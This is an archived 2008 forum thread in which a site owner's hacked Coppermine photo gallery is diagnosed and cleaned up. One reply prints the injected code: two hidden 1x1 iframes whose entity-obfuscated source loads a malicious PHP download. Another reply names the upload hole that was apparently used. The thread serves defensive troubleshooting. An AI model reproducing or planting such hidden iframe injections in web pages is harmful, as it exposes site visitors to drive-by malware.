Gmail Calendar Documents Reader Web more »
Recently Visited Groups | Help | Sign in
Google Groups Home
Discussions > Troubleshooting & Implementation Questions > Script appears to be running from GoogleADs
There are currently too many topics in this group that display first. To make this topic appear first, remove this option from another topic.
There was an error processing your request. Please try again.
flag
  6 messages - Collapse all  -  Translate all to Translated (View all originals)
The group you are posting to is a Usenet group. Messages posted to this group will make your email address visible to anyone on the Internet.
Your reply message has not been sent.
Your post was successful
 
From:
To:
Cc:
Followup To:
Add Cc | Add Followup-to | Edit Subject
Subject:
Validation:
For verification purposes please type the characters you see in the picture below or the numbers you hear by clicking the accessibility icon. Listen and type the numbers you hear
 
achick  
View profile  
 More options Apr 7 2008, 2:59 am
From: achick
Date: Sun, 6 Apr 2008 23:59:29 -0700 (PDT)
Local: Mon, Apr 7 2008 2:59 am
Subject: Script appears to be running from GoogleADs
I run the following website - http://www.lincsbirds.co.uk/album/ and
have googleADS on the site.

The site is a Coppermine Photo Album - patched to the latest version.

When I access the page I get the following virus messages - all
POINTING towards it coming from GoogleADs.

http://pagead2.googlesyndication.com/pagead/ads?client=ca-pub-1166176...

http://pagead2.googlesyndication.com/pagead/ads?client=ca-pub-1166176...

http://cdpuvbhfzz.com/dl/adv598.php

http://pagead2.googlesyndication.com/pagead/ads?client=ca-pub-1166176...

I have upload latest patches, and installed them, so I am running the
latest version of the photo album software?

Any help or suggestions to what is going on would be appreciated

Regards

Andrew


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Cass-hacks  
View profile  
 More options Apr 7 2008, 4:15 am
From: Cass-hacks
Date: Mon, 7 Apr 2008 01:15:16 -0700 (PDT)
Local: Mon, Apr 7 2008 4:15 am
Subject: Re: Script appears to be running from GoogleADs
It is not coming from the AdSense ads, it is coming from a couple of
iFrames that have been inserted into the bottom of your page and
attempt to cause a remote action to be taken.

Here is the code that has been inserted.
<iframe
src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&# 98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97 ;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;"
width=1 height=1></iframe><iframe
src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&# 98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97 ;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;"
width=1 height=1></iframe>

The first iFrame src points to "http : // cdpuvbhfzz.com / dl /
adv598.php"

The second one is the same as the first.

Whether the code actually exists in the page, suggesting the page was
hacked or the server was hacked to automatically insert the code at
the end of every page can only be known by your checking your original
site files against those on the server.

In other words, either just the pages of your site has been hacked
somehow or your server itself has been gotten into.


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Cass-hacks  
View profile  
 More options Apr 7 2008, 4:19 am
From: Cass-hacks
Date: Mon, 7 Apr 2008 01:19:30 -0700 (PDT)
Local: Mon, Apr 7 2008 4:19 am
Subject: Re: Script appears to be running from GoogleADs
Also, from a search engine point of view, you would be better off to
dump the search engine spam you have at the bottom of the pages of
your site.

That is a violation of Google's Webmaster Guidelines and can cause a
site to get de-indexed and it being a violation of the Webmaster
Guidelines, would in turn violate the AdSense Program Policy.

You may have gotten away with it for now but that won't last and
getting your site tanked in Google is one thing that can be repaired
but if your AdSense account is disabled, that is something that can
not be repaired.


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
achick  
View profile  
 More options Apr 7 2008, 5:42 am
From: achick
Date: Mon, 7 Apr 2008 02:42:02 -0700 (PDT)
Local: Mon, Apr 7 2008 5:42 am
Subject: Re: Script appears to be running from GoogleADs
Thanks for the advice.

1. The keywords have been removed!

2. The iframe has been removed and it appears to have resolved itself

Thanks

Andrew

On Apr 7, 9:19 am, Cass-hacks wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Cass-hacks  
View profile  
 More options Apr 7 2008, 8:00 am
From: Cass-hacks
Date: Mon, 7 Apr 2008 05:00:14 -0700 (PDT)
Local: Mon, Apr 7 2008 8:00 am
Subject: Re: Script appears to be running from GoogleADs

> Thanks for the advice.

I'm glad to help when I can. :-)

> 1. The keywords have been removed!

Cool!  If you would like help on the Google Search side of things,
there is a Google Webmaster Help Google Groups very much like this one
for Google AdSense.  Check out http://groups.google.com/group/Google_Webmaster_Help
when you can or if you need.

> 2. The iframe has been removed and it appears to have resolved itself

Excellent!

But, where someone got in once, someone may be able to get in again.
Making sure whatever hole was used is now plugged is the rest of what
needs to be done, if you haven't already.

Often is the case that the "hack" is executed via a script that is
coded to crawl looking for specific vulnerabilities.  When it finds a
acceptable host, it "infects" it and moves on looking for other hosts
that the exploit works against.

What is especially interesting is that the iframe was inserted twice.
Whether that happened on two separate occasions or it got hit twice
the first time around is hard to tell from this vantage point but one
thing is for sure, if the hole isn't plugged, it will leak again.


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
mentalist3d  
View profile  
(1 user)  More options Apr 10 2008, 12:42 pm
From: mentalist3d
Date: Thu, 10 Apr 2008 09:42:28 -0700 (PDT)
Local: Thurs, Apr 10 2008 12:42 pm
Subject: Re: Script appears to be running from GoogleADs
Disable your URI uploads within your Group settings, coppermine has
reported this is where the hack got access to your server, also check
out your user albums on your server and within the album 10001 there
may be a zip file and image: 142739_298w3.zip this is actually a PHP
script which is changing all your folders permissions allowing them to
overwrite the coppermine script and include the i-frame.

Try and check out: http://forum.coppermine-gallery.net/index.php/topic,51671.0.html
this has some good help on resolving the issues specifically with
coppermine galleries. Their is a script on page 2 that will remove the
malicious code from your site but use at your own risk. I was affected
this morning as well so now I'm upgrading to the latest coppermine
version.

Hope some of this helps :-)

On Apr 7, 9:15 am, Cass-hacks wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
End of messages
« Back to Discussions « Newer topic     Older topic »

Create a group - Google Groups - Google Home - Terms of Service - Privacy Policy
©2009 Google